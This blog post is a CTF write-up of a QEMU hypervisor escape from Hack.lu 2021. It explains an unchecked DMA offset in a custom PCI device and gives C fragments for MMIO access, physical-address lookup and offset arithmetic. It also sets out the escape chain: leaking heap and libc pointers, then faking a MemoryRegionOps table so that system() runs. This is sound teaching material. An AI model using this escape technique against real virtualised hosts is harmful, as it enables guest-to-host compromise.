blog of bosh mainly cybersec

Escaping the Hypervisor: CloudInspect

To get a better grasp of how QEMU (an open-source hypervisor) internals work for a research project, I decided to upsolve cloudinspect from Hack.lu 2021.

The challenge is simple in concept: an out-of-bounds write and read on the hypervisor heap, caused by a custom PCI device.

Background and Vulnerability

We are given the source code (in the form of a patchfile) to a custom PCI device. QEMU gives each of these devices a dedicated memory region, and we interact with it by writing to MMIO (memory-mapped I/O) register offsets.

The device keeps its state in a struct of type CloudInspectState, shown below:

+struct CloudInspectState {
+    PCIDevice pdev;
+    MemoryRegion mmio;
+    AddressSpace *as;
+
+    struct dma_state {
+        dma_addr_t src;
+        dma_addr_t dst;
+        dma_addr_t cnt;
+        dma_addr_t cmd;
+    } dma;
+    char dma_buf[DMA_SIZE];
+};

Note the four values tracked in the dma struct: src, dst, cnt, and cmd.

Next comes a MemoryRegionOps struct, which holds metadata as well as the handlers QEMU runs whenever there is a read from or write to the memory region.

+static const MemoryRegionOps cloudinspect_mmio_ops = {
+    .read = cloudinspect_mmio_read,
+    .write = cloudinspect_mmio_write,
+    .endianness = DEVICE_NATIVE_ENDIAN,
+    .valid = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+    .impl = {
+        .min_access_size = 4,
+        .max_access_size = 8,
+    },
+
+};

In this case, we see that reading from the address space given to the PCI device is handled by cloudinspect_mmio_read, and writing is handled similarly.

The function signatures for the read and write handlers are similar:

static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)

static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)

The opaque pointer is a pointer to the current CloudInspectState object, and the addr value is the offset into the address space of the device. The val value for cloudinspect_mmio_write is the value being written.

Now, depending on the value of addr (where we are reading/writing to), different behaviors result.

For example, to set the CMD register, we write the value we want to offset CLOUDINSPECT_MMIO_OFFSET_CMD. Writes like this simply set the fields of the dma struct, which are later used by the DMA handler.

We can also trigger a DMA (direct memory access) operation by reading or writing a value to CLOUDINSPECT_MMIO_OFFSET_TRIGGER. This calls cloudinspect_DMA_op, which in turn calls cloudinspect_dma_rw if the CMD register is set correctly.
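To make the register interface concrete, here is a minimal sketch of how a guest program might program a transfer and then trigger it. The offsets and the command value below are placeholders, not the challenge's real numbers (those are the CLOUDINSPECT_MMIO_OFFSET_* constants and command codes in the patch), and the helper names are my own.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Placeholder layout: NOT the real values. Substitute the
 * CLOUDINSPECT_MMIO_OFFSET_* constants and command codes from the patch. */
#define HYP_OFF_CMD      0x00u
#define HYP_OFF_SRC      0x08u
#define HYP_OFF_DST      0x10u
#define HYP_OFF_CNT      0x18u
#define HYP_OFF_TRIGGER  0x20u
#define HYP_REGION_SIZE  0x28u
#define HYP_CMD_GET      1u   /* hypothetical "device to guest" command */

/* One 8-byte store into the mapped region. When base is the device's
 * MMIO mapping, the store reaches the write handler with addr == off. */
static void mmio_write64(volatile uint8_t *base, size_t off, uint64_t val)
{
    assert(off % 8 == 0 && off + 8 <= HYP_REGION_SIZE);
    *(volatile uint64_t *)(base + off) = val;
}

/* One 8-byte load; on real MMIO this reaches the read handler. */
static uint64_t mmio_read64(volatile uint8_t *base, size_t off)
{
    assert(off % 8 == 0 && off + 8 <= HYP_REGION_SIZE);
    return *(volatile uint64_t *)(base + off);
}

/* Fill in the dma fields, then touch the trigger register to start
 * a transfer from dma_buf + src_off to guest address dst_phys. */
static void dma_from_device(volatile uint8_t *base, uint64_t src_off,
                            uint64_t dst_phys, uint64_t cnt)
{
    mmio_write64(base, HYP_OFF_CMD, HYP_CMD_GET);
    mmio_write64(base, HYP_OFF_SRC, src_off);
    mmio_write64(base, HYP_OFF_DST, dst_phys);
    mmio_write64(base, HYP_OFF_CNT, cnt);
    (void)mmio_read64(base, HYP_OFF_TRIGGER);
}
```

In the guest, base would typically come from mmap'ing the device's PCI resource file. Here the helpers work on any 8-byte-aligned buffer, which makes them easy to try out without the device.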

The function cloudinspect_dma_rw is where the actual vulnerability lies.

+static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)
+{
+    if (write) {
+        uint64_t dst = cloudinspect->dma.dst;
+        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
+        dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt);
+    } else {
+        uint64_t src = cloudinspect->dma.src;
+        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
+        dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt);
+    }
+}

Note that we can read and write out of bounds: nothing in this function checks that the src or dst offset, plus cloudinspect->dma.cnt, stays within the dma_buf array.
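For contrast, this is roughly the check the function is missing. It is a sketch of one way to validate an offset/length pair, not the challenge author's fix, and the DMA_SIZE value here is an assumption (the patch defines the real one).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define DMA_SIZE 4096  /* assumed value, for illustration only */

/* True if [off, off + cnt) lies entirely inside a DMA_SIZE-byte buffer.
 * We compare cnt against the remaining space instead of computing
 * off + cnt, because that sum could wrap around for huge inputs. */
static bool dma_range_ok(uint64_t off, uint64_t cnt)
{
    return off <= DMA_SIZE && cnt <= DMA_SIZE - off;
}

/* A few cases, including the wrapping offset the exploit relies on. */
static void range_check_demo(void)
{
    assert(dma_range_ok(0, DMA_SIZE));          /* whole buffer */
    assert(!dma_range_ok(DMA_SIZE - 8, 16));    /* runs past the end */
    assert(!dma_range_ok(UINT64_MAX - 7, 8));   /* "negative" offset */
}
```

With a check like this in front of both branches, neither the past-the-end access nor the wrapping offset would get through.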

However, we do have to be careful. When reading values (the call to dma_memory_write), the device copies cnt bytes from cloudinspect->dma_buf + src to the guest address stored in cloudinspect->dma.dst. This means that we must set cloudinspect->dma.dst to a valid physical memory address (at least in the eyes of QEMU), or else the write will go to an invalid address.

Exploitation

The plan for exploitation is rather straightforward. We will first map a buffer which will serve as our communication gateway to the device. Then, we will map another one which will be used by us and the DMA handler to exchange values. We’ll need the physical address of the second buffer, which we can find by reading from /proc/self/pagemap.
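The pagemap lookup can be sketched as follows. Each page of the process has one 64-bit entry in /proc/self/pagemap, where bit 63 marks the page as present and bits 0-54 hold the page frame number. The function names are my own, and error handling is reduced to returning 0.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

#define PM_PRESENT   (1ULL << 63)          /* page is present in RAM */
#define PM_PFN_MASK  ((1ULL << 55) - 1)    /* bits 0-54: frame number */

/* Decode one pagemap entry into a physical address.
 * Returns 0 if the page is not present. */
static uint64_t pagemap_entry_to_phys(uint64_t entry, uint64_t vaddr,
                                      uint64_t page_size)
{
    /* page_size must be a power of two for the mask below to work */
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    if (!(entry & PM_PRESENT))
        return 0;
    return (entry & PM_PFN_MASK) * page_size + (vaddr & (page_size - 1));
}

/* Look up the physical address behind p, or 0 on any failure. */
uint64_t virt_to_phys(const void *p)
{
    uint64_t vaddr = (uint64_t)(uintptr_t)p;
    uint64_t page_size = (uint64_t)sysconf(_SC_PAGESIZE);
    uint64_t entry = 0;
    int fd = open("/proc/self/pagemap", O_RDONLY);

    if (fd < 0)
        return 0;
    /* Entries are 8 bytes each, indexed by virtual page number. */
    off_t pos = (off_t)(vaddr / page_size * sizeof(entry));
    if (lseek(fd, pos, SEEK_SET) != pos ||
        read(fd, &entry, sizeof(entry)) != (ssize_t)sizeof(entry)) {
        close(fd);
        return 0;
    }
    close(fd);
    return pagemap_entry_to_phys(entry, vaddr, page_size);
}
```

Two practical caveats: the buffer should be touched (and ideally locked with mlock) before the lookup so the page is actually present, and since Linux 4.2 the frame number reads as zero unless the process has CAP_SYS_ADMIN, so this needs to run as root in the guest.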

Then, we will leak the cloudinspect->mmio.opaque pointer. This pointer points to the cloudinspect object itself. Remember that along with our out-of-bounds read, we also have a negative-index read: the offset is unsigned, so setting the SRC register to a value that wraps around reaches memory before dma_buf, where the mmio field lives.

As the cloudinspect object itself is on the heap, we can now achieve an arbitrary read/write, because we can just compute the correct relative index from cloudinspect->dma_buf to any address we want in the hypervisor's address space.
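The relative-index computation is plain unsigned arithmetic. The sketch below uses made-up addresses and my own helper names. The offset of dma_buf inside CloudInspectState depends on the QEMU build and has to be looked up, so it is a parameter here.

```c
#include <assert.h>
#include <stdint.h>

/* Address of dma_buf, given the leaked address of the state object.
 * dma_buf_field_off is offsetof(CloudInspectState, dma_buf) for the
 * target build, which is an input we have to find separately. */
static uint64_t dma_buf_from_state(uint64_t state_addr,
                                   uint64_t dma_buf_field_off)
{
    return state_addr + dma_buf_field_off;
}

/* Value to program into SRC or DST so that dma_buf + offset lands on
 * target. Unsigned subtraction wraps modulo 2^64, so a target below
 * dma_buf yields a huge offset that wraps back when added. */
static uint64_t offset_to(uint64_t dma_buf_addr, uint64_t target)
{
    return target - dma_buf_addr;
}

static void offset_demo(void)
{
    uint64_t dma_buf = 0x5555deadb000ULL;    /* made-up address */
    uint64_t target  = 0x7f0012345678ULL;    /* made-up address */

    /* Eight bytes before the buffer: a "negative" index. */
    assert(offset_to(dma_buf, dma_buf - 8) == UINT64_MAX - 7);
    /* Adding the offset back reaches the target exactly. */
    assert(dma_buf + offset_to(dma_buf, target) == target);
}
```

The same computation works in both directions, which is why a single leaked heap address is enough to reach anything the hypervisor process has mapped.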

In order to leak the hypervisor’s libc pointer, we first dump values from past the end of cloudinspect->dma_buf until we find one that is in the same range as the binary, and note its offset. Then, all we need to do is use our arbitrary read to read pointers from the Global Offset Table of the hypervisor.
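Scanning the dump for a pointer into the binary can be sketched like this. The address range and the static offset are made-up values for illustration. In practice the range comes from knowing roughly where the binary is mapped, and the offset from looking up the leaked pointer in the binary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Index of the first 8-byte value in dump that falls in [lo, hi),
 * or -1 if there is none. */
static long find_ptr_in_range(const uint64_t *dump, size_t n,
                              uint64_t lo, uint64_t hi)
{
    for (size_t i = 0; i < n; i++)
        if (dump[i] >= lo && dump[i] < hi)
            return (long)i;
    return -1;
}

/* Load base of the image, given a leaked pointer and that pointer's
 * offset within the image file. */
static uint64_t image_base(uint64_t leaked, uint64_t static_off)
{
    return leaked - static_off;
}

static void scan_demo(void)
{
    /* Made-up dump: a null, a stack-like value, junk, a binary pointer. */
    const uint64_t dump[] = {
        0, 0x7ffd00001000ULL, 0x41, 0x55d1c0a3f2e0ULL
    };
    long i = find_ptr_in_range(dump, 4,
                               0x550000000000ULL, 0x570000000000ULL);

    assert(i == 3);
    assert(image_base(dump[i], 0xa3f2e0ULL) == 0x55d1c0000000ULL);
}
```

Once the base is known, the address of any GOT entry is the base plus that entry's offset in the binary, and the arbitrary read turns it into a libc address.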

Since the hypervisor has all protections enabled, it is not possible to just change a value in the GOT. Additionally, we can’t just overwrite the current read/write handlers because the structure containing them is in read-only memory. However, we can control program flow by building our own fake MemoryRegionOps structure and pointing cloudinspect->mmio.ops at it.

We can exploit the fact that cloudinspect->mmio.opaque is passed as the first argument to the read and write handlers. By setting the handlers to system, we can redirect control flow to a call to system(). We’ll also need to write the command cat flag onto the heap somewhere, so we can call system() on it by overwriting cloudinspect->mmio.opaque with its address.
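Here is a small self-contained model of why swapping those two pointers is enough. The types are simplified stand-ins for QEMU's MemoryRegion and MemoryRegionOps, keeping only the fields the dispatch uses, and fake_system records its argument instead of running anything. None of this is QEMU code.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-ins for QEMU's types (assumed shape, model only). */
typedef struct ModelOps {
    uint64_t (*read)(void *opaque, uint64_t addr, unsigned size);
    void (*write)(void *opaque, uint64_t addr, uint64_t val, unsigned size);
} ModelOps;

typedef struct ModelRegion {
    const ModelOps *ops;   /* plays the role of mmio.ops */
    void *opaque;          /* plays the role of mmio.opaque */
} ModelRegion;

/* What the hypervisor effectively does on a guest MMIO read. */
static uint64_t model_dispatch_read(ModelRegion *mr, uint64_t addr,
                                    unsigned size)
{
    return mr->ops->read(mr->opaque, addr, size);
}

static uint64_t legit_read(void *opaque, uint64_t addr, unsigned size)
{
    (void)opaque; (void)addr; (void)size;
    return 0;
}

/* Stand-in for system(): remembers the command it was handed. */
static char last_cmd[32];
static uint64_t fake_system(void *opaque, uint64_t addr, unsigned size)
{
    (void)addr; (void)size;
    strncpy(last_cmd, (const char *)opaque, sizeof(last_cmd) - 1);
    return 0;
}

static const char *hijack_demo(void)
{
    static const ModelOps real_ops = { legit_read, NULL }; /* read-only */
    static ModelOps fake_ops = { fake_system, NULL };      /* our copy */
    static char cmd[] = "cat flag";
    int state = 0;
    ModelRegion mr = { &real_ops, &state };

    /* The two writes the exploit performs with its arbitrary write. */
    mr.ops = &fake_ops;
    mr.opaque = cmd;

    /* Any guest read now calls our function with our string. */
    model_dispatch_read(&mr, 0, 4);
    assert(strcmp(last_cmd, "cat flag") == 0);
    return last_cmd;
}
```

In the real exploit the read slot holds the address of system() itself. It only takes one argument, and in practice the extra addr and size arguments are ignored under the x86-64 calling convention.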

Then all we have to do is try to read from mmio, and we’ll get the flag back!

You can find the full exploit script here, along with marginal comments.